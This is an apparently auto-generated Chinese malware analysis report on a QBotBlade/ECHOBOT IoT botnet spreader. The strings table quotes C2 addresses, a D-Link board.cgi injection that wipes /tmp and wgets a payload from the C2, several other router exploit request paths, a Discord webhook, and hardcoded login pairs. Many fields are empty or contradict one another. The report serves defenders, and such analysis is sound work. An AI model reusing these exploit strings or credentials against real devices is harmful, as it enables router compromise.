| 分类 | 标签 | 置信度 |
|---|---|---|
| 恶意类型 | IoT 僵尸网络传播器 (蠕虫式) | HIGH |
| 家族 | QBotBlade/ECHOBOT | HIGH |
| C2 | 185.183.34[.]45/LjEZs/ | HIGH |
| 架构 | Motorola m68k (罕见) | HIGH |
| 传播方式 | 12+ 路由器漏洞利用 + UPnP SOAP | HIGH |
| 外泄通道 | Discord Webhook | MEDIUM |
| 签名 | r00ts3c-owned-you User-Agent | MEDIUM |
| 字段 | 值 |
|---|---|
| 关联组织 | 未归因 |
| 别名 | ? |
| 动机 | ? |
| 目标行业 | ? |
| 活动名称 | ? |
| C2协议 | HTTP (wget 下载第二阶段载荷) |
| C2基础设施 | 185.183.34[.]45 |
| 位置 | N/A |
| 方法 | N/A |
| 触发 | N/A |
N/A
| 维度 | 评估 |
|---|---|
| 持久化 | 未知 |
| 协议 | HTTP (wget 下载第二阶段载荷) |
| 端口 | |
| 地址/Domain | 185.183.34[.]45 |
| IP | 185.183.34.45 |
| 加密 | 未知 |
| 用途 | C2 |
| API引用 | |
| 证书 | N/A |
未知
C2
N/A
| 段/节区 | 熵值 | 判定 |
|---|---|---|
| .text | 6.30 | 正常 |
| 地址 | 函数 | 功能 |
|---|---|---|
| N/A | ||
| 调用号 | 系统调用 | 用途 | 地址 |
|---|---|---|---|
| N/A | |||
| 字段 | 值 | 来源 |
|---|---|---|
| 编译器 | Motorola m68k Cross-Compile GCC | DIE |
| 维度 | 本样本 | QBotBlade/ECHOBOT IoT Botnet | F2 | F3 | F4 | F5 | F6 | F7 | F8 | 匹配 |
|---|
| 变种 | 架构 | 大小 | 编译器 | 特征 | 状态 |
|---|---|---|---|---|---|
| N/A | |||||
行为: 恶意行为
证据: 已确认
未构建
无数据
| 维度 | 证据 | 权重 | 恶意指数 |
|---|---|---|---|
| 恶意 | 已确认 | 10 | 9/10 |
恶意软件
| 层 | API/技术 | 检测目标 | 绕过难度 |
|---|---|---|---|
| 无 | |||
| 检测方法 | VMware | VirtualBox | QEMU/KVM |
|---|---|---|---|
| 无 | — | — | — |
| 技术 | 是否存在 | 证据 | 对抗难度 |
|---|---|---|---|
| 符号剥离 | 已检测 | stripped | 低 |
| 层 | 操作 | API/命令 | 证据来源 |
|---|---|---|---|
| 无 | |||
| 反编译函数数 | 0 |
| 反编译输出 | N/A |
| 分析时长 | N/A |
/* 跳过 */| 总函数数 | 总调用关系 | 最大调用深度 |
|---|---|---|
| 0 | ? | ? |
N/A
| QEMU 模式 | 跳过 |
| 网络隔离 | 未配置 |
| 执行结果 | N/A |
| C2 数据 | 无 C2 通信 |
| 偏移 | 字符串 | 类型 | 用途/含义 | 威胁等级 |
|---|---|---|---|---|
| Strings | 185.183.34.45 | C2 | 第二阶段载荷托管服务器 | HIGH |
| Strings | 176.32.33.88 | C2 | 华为路由器专用 C2 | HIGH |
| Strings | QBotBladeSPOOKY | Bot 名称 | 僵尸网络标识符 | HIGH |
| Strings | ECHOBOT | Bot 名称 | 僵尸网络标识符 | HIGH |
| Strings | r00ts3c-owned-you | User-Agent | 攻击者签名 | HIGH |
| Strings | GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://185.183.34.45/LjEZs/awsec2 | 漏洞利用 | D-Link board.cgi RCE | HIGH |
| Strings | POST /HNAP1/ HTTP/1.0 | 漏洞利用 | D-Link HNAP1 RCE | HIGH |
| Strings | POST /UD/act?1 HTTP/1.1 | 漏洞利用 | TR-064 SetNTPServers RCE | HIGH |
| Strings | POST /GponForm/diag_Form?images/ | 漏洞利用 | GPON 路由器 RCE | HIGH |
| Strings | GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd= | 漏洞利用 | Netgear setup.cgi RCE | HIGH |
| Strings | /api/webhooks/1532385947382055023/ | 外泄 | Discord Webhook 外泄通道 | HIGH |
| Strings | stackato:stackato | 凭据 | 硬编码 SSH/Telnet 凭据 | MEDIUM |
| Strings | root:blackarch | 凭据 | 硬编码 SSH/Telnet 凭据 | MEDIUM |
| Strings | hacker:compass | 凭据 | 硬编码 SSH/Telnet 凭据 | MEDIUM |
185.183.34[.]45
185.183.34[.]45 — C2 服务器4169898705c73de32d18ff6cbabc18ab416450d4503ba51ad66e02d256e9e647 — 样本哈希未生成
| 判定结果 | 🔴 恶意软件 |
| 恶意类型 | 待分类 |
| 恶意家族 | QBotBlade/ECHOBOT IoT Botnet |
| 威胁级别 | HIGH |
| 置信度 | 85% — 分析不完整 |
| 关联组织 | 未知 |
| 目标平台 | N/A |
| 感染链位置 | 待确定 |
大规模 IoT 僵尸网络传播器,12+ 漏洞利用,C2: 185.183.34.45/LjEZs/。支持 12 种路由器漏洞利用,Discord Webhook 外泄,UPnP SOAP 传播。